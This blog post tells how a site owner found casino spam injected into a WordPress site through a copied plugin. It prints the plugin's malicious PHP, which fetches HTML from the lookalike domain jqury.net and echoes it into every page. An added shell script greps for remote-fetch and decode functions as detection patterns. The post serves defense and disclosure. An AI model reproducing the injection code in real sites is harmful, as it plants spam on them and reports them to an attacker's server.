Fighting WordPress spam in the source of a template

Today I realized that one of my websites had a hidden div with malicious content, mostly casino-related scam links. At first I believed that this WordPress spam had been injected somehow into the template files. Scanning all files and doing a recursive grep gave no results, and sites like Sucuri could not detect it.

The server itself is fairly well secured: all requests go through a web application firewall and each site runs under its own Linux user and processes. There were no hints of intrusion, and all other sites were running as expected. So how could this have happened?

For starters, it looked like this:

<div id="fb9735872">
<p>Enjoy <a href="{removed}" title="Online Gambeling">Online Gambeling</a> money odds. Casinos online wagering slot games with <a href="{removed}" title="Mobile Casino">Mobile Casino</a> sports real ....
</div>

It also included a JavaScript snippet to hide the div. My first step was to disable all the enabled plugins and reactivate them one by one while checking the source of my website. After a while I found an old plugin I had copied from another website; when it was disabled, the malicious div disappeared.

After looking carefully at all its source files, I found the malicious code near the end:

$ch = curl_init();
// Lookalike of jquery.net; the "?1" parameter selects the spam payload
curl_setopt($ch, CURLOPT_URL, "http://www.jqury.net/?1");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// Referer is set to the infected site's own hostname
curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
$jquery = curl_exec($ch);
curl_close($ch);
// Whatever the remote server returns is written straight into the page
echo "$jquery";

As you can see, the planted code was retrieving all that casino spam from the URL jqury.net on every request, which is also why a recursive grep of the files on disk found none of the spam text: only the fetch code lives in the plugin, the payload never does. The domain was almost invisible at first, as it resembles jquery.net and actually redirects to it, but when given the right parameter it spits out the HTML spam. Setting the Referer header to the site's own hostname also tells whoever runs that server which site is calling back. Removing this code solved the problem and everything went back to normal.
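The recursive grep mentioned at the start came back empty because it searched for the spam text, which is fetched at request time and never stored. The shell script below is an added example (not code from the original post) of the grep a practitioner would run instead: it searches a plugin tree for the request-time fetch and decode primitives that such a payload needs, and lists every hard-coded remote hostname so that a lookalike such as jqury.net stands out next to the hosts you expect. The pattern list, the function names and the example path are this example's own choices, not anything from the plugin in question.

```shell
#!/bin/sh
# Added example, not code from the original post. Audits a WordPress plugin
# directory for the *mechanism* behind injected spam like the div above:
# PHP that pulls content from a remote host at request time, so the payload
# never touches the disk and a grep for the spam text finds nothing.
# Hits are leads to read by hand, not proof of compromise: legitimate plugins
# also call the WordPress HTTP API or decode base64.
#
# Usage: audit_remote_fetch /var/www/example/wp-content/plugins
#        list_remote_hosts  /var/www/example/wp-content/plugins

# Fetch/execute primitives worth reading around (assumed list; extend as needed).
# file_get_contents/fopen are only flagged with a literal http(s) URL argument,
# so a URL held in a variable is missed there; list_remote_hosts still shows it.
REMOTE_FETCH_PATTERN='curl_init|curl_exec|curl_setopt|fsockopen|wp_remote_get|wp_remote_retrieve_body|(file_get_contents|fopen)[[:space:]]*\([[:space:]]*.https?://|eval[[:space:]]*\(|base64_decode|gzinflate|str_rot13'

# Print file:line:code for every PHP line matching the pattern.
# Returns 0 when the tree is clean, 1 when there is something to review,
# 2 when the argument is not a directory.
audit_remote_fetch() {
    dir="$1"
    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; return 2; }
    # -r recurse, -I skip binaries, -E extended regex, -n line numbers
    hits=$(grep -rIEn --include='*.php' "$REMOTE_FETCH_PATTERN" "$dir")
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Print every distinct hostname that appears in a literal http(s) URL in the
# tree, one per line, so a lookalike domain stands out next to the expected ones.
list_remote_hosts() {
    dir="$1"
    grep -rIEoh --include='*.php' 'https?://[A-Za-z0-9.-]+' "$dir" 2>/dev/null \
        | sed -E 's#^https?://##' | sort -u
}
```

Run both functions against wp-content/plugins (and wp-content/themes) and read around each hit: a call to wp_remote_get in a well-known plugin is normal, a curl call whose response is echoed straight into the page is not.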

It turns out that all curl functions were disabled on my other site, so I never encountered this until now. Disabling curl only closes that one channel, though: file_get_contents with allow_url_fopen enabled, or the WordPress HTTP API (wp_remote_get), can fetch remote content just as well. In conclusion: never copy code, even code you already use on other sites, without closely reviewing its source. Always keep plugins updated and as close to stock as possible.

